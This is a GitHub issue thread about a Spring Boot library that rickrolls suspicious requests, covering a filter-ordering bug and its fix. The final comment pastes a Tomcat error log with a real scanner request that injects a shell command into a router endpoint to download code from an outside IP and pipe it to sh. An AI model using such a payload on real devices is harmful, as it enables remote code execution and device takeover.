Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Can't rickroll when RequestRejectedException is thrown #20

Open
tschuehly opened this issue Jun 14, 2024 · 4 comments
Open

Can't rickroll when RequestRejectedException is thrown #20

tschuehly opened this issue Jun 14, 2024 · 4 comments
Assignees
@TomCools
Labels
bug Something isn't working

Comments

@tschuehly
Copy link

tschuehly commented Jun 14, 2024
edited
Loading

My wordpress guys can't formulate proper URLs:
image

The request is rejected before the filter and the rickroll is not applied.

I've tried adding an ExceptionAdvice but Spring routes to the /error endpoint before the Exception is caught

    @ExceptionHandler(RequestRejectedException::class)
    @ResponseBody
    fun handleRequestRejected(e: RequestRejectedException, response: HttpServletResponse) {
        response.sendRedirect("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
    }
@TomCools
Copy link
Owner

Thanks for the report! Will look into this.

@TomCools TomCools self-assigned this Jun 14, 2024
@TomCools TomCools added the bug Something isn't working label Jun 14, 2024
@TomCools
Copy link
Owner

TomCools commented Jun 14, 2024
edited
Loading

@tschuehly found the issue, simple missing @Order annotation on the Filter. I do have some issues with my release setup, so it'll be for tomorrow morning.

@TomCools
Copy link
Owner

@tschuehly: This has been included in a new release: https://github.com/TomCools/rickroll-security-spring-boot-starter/releases/tag/v3.2.1.

I'll close this ticket once you've confirmed it works for you as well ;)

@tschuehly
Copy link
Author

Hey @TomCools the fix works!

It doesn't apply if tomcat catches the request because of an invalid character. This one clogs my logs aswell 😔

java.lang.IllegalArgumentException: Invalid character found in the request target [/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) ]. 
The valid characters are defined in RFC 7230 and RFC 3986
	at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:264) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at java.base/java.lang.Thread.run(Unknown Source) ~[na:na]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@TomCools TomCools

Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@TomCools @tschuehly